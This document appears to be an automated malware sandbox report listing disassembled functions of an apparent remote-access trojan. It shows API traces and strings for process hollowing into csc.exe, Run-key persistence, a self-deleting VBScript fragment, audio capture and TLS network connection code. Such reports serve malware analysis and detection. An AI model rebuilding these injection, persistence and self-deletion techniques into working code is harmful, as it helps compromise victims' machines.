Function 004180EF Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwClose, xrefs: 00418163
`Wu, xrefs: 0041830B
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168
ZwMapViewOfSection, xrefs: 0041813B
ZwCreateSection, xrefs: 0041811C
ZwUnmapViewOfSection, xrefs: 0041814F

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
API String ID: 4188446516-529412701
Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

dMG, xrefs: 0040D45B
while fso.FileExists(", xrefs: 0040D5EC
Temp, xrefs: 0040D580
On Error Resume Next, xrefs: 0040D5B9
exepath, xrefs: 0040D4F7
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
fso.DeleteFile ", xrefs: 0040D63A
fso.DeleteFolder ", xrefs: 0040D6AB
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
\update.vbs, xrefs: 0040D57B
""", 0, xrefs: 0040D6E7
8SG, xrefs: 0040D4CF
wend, xrefs: 0040D689
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
open, xrefs: 0040D7BE
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
"), xrefs: 0040D5D5
0qF, xrefs: 0040D78C, 0040D797

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

8SG, xrefs: 0040D15E
while fso.FileExists(", xrefs: 0040D2C8
Temp, xrefs: 0040D246
On Error Resume Next, xrefs: 0040D294
.vbs, xrefs: 0040D201
exepath, xrefs: 0040D181
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
dMG, xrefs: 0040D0D1
fso.DeleteFile ", xrefs: 0040D315
fso.DeleteFolder ", xrefs: 0040D38A
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
pth_unenc, xrefs: 0040D09C
wend, xrefs: 0040D364
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
hpF, xrefs: 0040D38F
open, xrefs: 0040D40C
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
"), xrefs: 0040D2B1

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32(?,.exe), ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

temp_, xrefs: 004125E3
open, xrefs: 0041263B
8SG, xrefs: 004124A6
exepath, xrefs: 004124CC
.exe, xrefs: 004125F5
WDH, xrefs: 00412548, 004126B6

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

resume audio, xrefs: 0041B1E2
pause audio, xrefs: 0041B1CA
stop audio, xrefs: 0041B257
NG, xrefs: 0041B109, 0041B08B
open ", xrefs: 0041B0D0
status audio mode, xrefs: 0041B1F7
alias audio, xrefs: 0041B0B8
close audio, xrefs: 0041B261
stopped, xrefs: 0041B202
" type , xrefs: 0041B0D5
play audio, xrefs: 0041B14B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlAcquirePebLock, xrefs: 004072C4
RtlInitUnicodeString, xrefs: 0040727E
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
NtAllocateVirtualMemory, xrefs: 0040729C
RtlReleasePebLock, xrefs: 004072D8
LdrEnumerateLoadedModules, xrefs: 004072EC
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 00407271
NtFreeVirtualMemory, xrefs: 004072B0

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-1877645540
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32(?), ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32(?,?), ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_wcschr.LIBVCRUNTIME ref: 0044F68F
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Uniqueness

Uniqueness Score: -1.00%

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

Publisher, xrefs: 0041C751
InstallLocation, xrefs: 0041C77C
InstallDate, xrefs: 0041C790
UninstallString, xrefs: 0041C7A4
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
DisplayName, xrefs: 0041C73C
DisplayVersion, xrefs: 0041C768

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927

Strings

8SG, xrefs: 0040A802
pQG, xrefs: 0040A761
pQG, xrefs: 0040A771
PG, xrefs: 0040A7AC
PG, xrefs: 0040A907
8SG, xrefs: 0040A7F7

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Uniqueness

Uniqueness Score: -1.00%

Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

TLS Handshake... | , xrefs: 00404904
TLS Error 2, xrefs: 00404955
Connection Failed: , xrefs: 00404A43
PkGNG, xrefs: 004048C8
TLS Error 3, xrefs: 004049D8
Connection Refused, xrefs: 00404A76
TLS Authentication Failed, xrefs: 00404999
TLS Error 1, xrefs: 00404937

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-3229884001
Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Uniqueness

Uniqueness Score: -1.00%

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
